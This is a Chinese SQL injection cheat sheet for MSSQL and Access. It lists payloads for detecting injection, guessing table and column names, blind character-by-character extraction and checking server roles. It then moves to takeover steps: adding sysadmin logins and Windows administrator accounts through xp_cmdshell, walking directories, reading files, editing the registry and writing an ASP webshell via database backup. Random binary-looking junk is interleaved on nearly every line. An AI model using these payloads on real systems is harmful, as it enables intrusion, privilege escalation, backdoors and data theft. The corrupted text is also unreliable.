1.判断是否有注入;and 1=1 ;and 1=2 +_fxV|}�P
2.初步判断是否是mssql ;and user>0 Daf��;;�
w
LZp�qv~a�v
3.注入参数是字符'and [查询条件] and ''=' ��u�_)�'}�
k8sjW!���2
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 'k$j^�|r�>
-��[l�O�f�
5.判断数据库系统 DT�V"~>@��
M[dJ���Q�(
;and (select count(*) from sysobjects)>0 mssql _K�>YB>W}7
cr{f*U�6`
;and (select count(*) from msysobjects)>0 access �S�R'u*�u!
�Y&�b� JKX
�a�/
Z\h{*
�{V�e_��u�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 rcM�Sso�2�
f,Dj@?�3+�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 L�T� '2446
:'gX//b):�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 8�<g9 ~��L
�3�hzK�d_�
9.(1)猜字段的ascii值(access) K<��w�$���
U{.y����X7
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 &Sp�2�['a!
}W�*�� �q�
(2)猜字段的ascii值(mssql) lZ��}H?�n%
B�}�p{$g�!
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 }�Ias7d?re
q6>%1��~�?
10.测试权限结构(mssql) |lf,3/*jDB
g�)~�"-uQQ
K�@@[N17/8
�w
]�$Hr �
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- xrl!$xE
GX
0W�>�,RR)�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ?,x��3*'-(
}��E�WPLJA
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- kEM�|;�&=_
uY|-: �=��
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- =E��T�|h}I
PzD�ek�yl
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- EJ�`"�npU
wt�nC^d$��
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Bgj^�n�{9x
�<MBpV^�Y}
;and 1=(select IS_MEMBER('db_owner'));-- -eoXaP�{�[
-�|A`+1-R+
�EAXb�bcV
z�7g=�L@ �
11.添加mssql和系统的帐户 \B~�}s��}�
OB5`a�,5dI
;exec master.dbo.sp_addlogin username;-- �6` �@4i'.
;exec master.dbo.sp_password null,username,password;-- %oE3q>S$en
S+&�Bf ~~D
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- "_T8Km008�
�D�F!*�S{)
;exec master.dbo.xp_cmdshell 'net user username password 0_faJjTbP;
<�m�dH�ca�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- :NPnw��X8w
Rz9Ij�L�.Z
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �;/g Bjp]H
wm�/=]*jpK
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
�h"D�xg�G
g/6>>p�`J�
a6�i%7O�m�
z�8\z`#g!�
12.(1)遍历目录 '�&��hk�?�
3��=�~0��m
;create table dirs(paths varchar(100), id int) 8%D� �2G i
{:0TiOP5x�
;insert dirs exec master.dbo.xp_dirtree 'c:\' &�`IC��3O5
Y�E5�B^sQ1
;and (select top 1 paths from dirs)>0 q�t�!0�#z8
Ryrvu�1 k
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) P4S]b�PI�p
YZ0Je�i8+-
E2~&GkU.UN
(W4H�?u@X0
(2)遍历目录 m]#oZ�Vngy
Twe�ku}�D7
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- w5u�Okz� #
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 2Ub!��we�e
d�GY:?m�f&
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �!�O�}�^�Y
D��YF�fq�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �Td/J6Q9�0
�cg]>*�lH
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �!m<v@SmL\
xaG( ���3�
\T]'d@Wyd�
�*�k���E<7
13.mssql中的存储过程 ����5�1&K�
L|���H:&|F
xp_regenumvalues 注册表根键, 子键 �lqoJ2JMy�
2=/,9�ka�~
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �l�OuO~`,J
E��+!A0�!1
xp_regread 根键,子键,键值名 A,��;V|jv9
M4`.��[P�4
;exec xp_regread �+�#V.�6i�
��r?j2%M\�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 &<�RK=e'*x
1�r���LK1X
xp_regwrite 根键,子键, 值名, 值类型, 值 Q^k\���q��
;bhD:$NB X
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 z�IT)Hs5��
;*}t�bh3;.
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ev�"f@y9Do
�Z_.xglq{�
xp_regdeletevalue 根键,子键,值名 L.tW]4��3K
#l?E2
U4WL
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 f\U(��7)2�
3JJE��j1O�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �@&xW�d{8'
�Qf��#=Y j
'`nf7���b(
VY|'7i�n"M
14.mssql的backup创建webshell �:���'�0.�
DP�5}�q"�l
use model la}Xo0nq0+
BD�iN*.�w5
create table cmd(str image); ^Ez�`�W��P
!�/RL.�`!>
insert into cmd(str) values (''); u�]�u�Zc~T
�0 F�-d��b
backup database model to disk='c:\l.asp'; �&����6q67
Rw!wfh_��+
��I92orr1�
&c�HA xker
15.mssql内置函数 �F+�Q(^N�k
t�hK4@C|X4
;and (select @@version)>0 获得Windows的版本号 �fx3��oA}
3 =-XA�2zJ
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ]�r.9�5|V*
w�Mv�Am%}+
;and (select user_name())>0 爆当前系统的连接用户 #)b0&wyW6i
Pof�]9qE-y
;and (select db_name())>0 得到当前连接的数据库 :-)H
ty�zf
�'�M�!*�Ge
;�@$v�_i��
G�A�+�#'R
16.简洁的webshell 8R�aR�X�nJ
��LzG�S��N
use model T6M�=Bk�cP
X 3q2���XU
create table cmd(str image); ~A$y-�Dt'
�~;/}D0k$x
insert into cmd(str) values (''); K$kI%eG�ZA
o7��sI�pE9
backup database model to disk='g:\wwwtest\l.asp';
